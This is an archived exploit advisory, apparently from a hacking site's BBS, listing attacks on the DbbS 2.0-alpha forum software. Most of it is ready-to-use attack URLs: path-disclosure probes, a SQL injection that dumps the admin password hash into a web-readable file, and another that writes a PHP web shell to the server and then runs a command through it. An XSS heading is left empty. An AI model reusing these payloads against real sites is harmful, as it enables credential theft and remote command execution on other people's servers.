AOH :: Web BBS :: etc :: B06-1660.HTM

AOH :: Web BBS :: etc :: B06-1660.HTM
DbbS<=2.0-alpha Multiple Vulnerabilities

DbbS<=2.0-alpha Multiple Vulnerabilities DbbS<=2.0-alpha Multiple Vulnerabilities


Special thanks to rgod for his help!!!

Full path disclosure

http://www.site.com/DbbS/topics.php?fcategoryid=' 
http://www.site.com/DbbS/script.php?unavariabile[]http://www.site.com/DbbS/script.php?GLOBALS[]http://www.site.com/DbbS/script.php?_SERVER[] 
MD5 Password

http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,pass%20INTO%20DUMPFILE'c:\\inetpub\\wwwroot\\dbbs\\test.txt'%20FROM%20forum_membres%20WHERE%20id='1'/* 

Create shell

http://www.site.com/DbbS/topics.php?fcategoryid=-999'%20UNION%20SELECT%20null,''%20INTO%20DUMPFILE'c:\\inetpub\\wwwroot\\dbbs\\suntzu.php'%20FROM%20forum_categories/* 

Launch a command

http://www.site.com/DbbS/suntzu.php?cmd=dir 

XSS

 

 


by rgod and yamcho

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.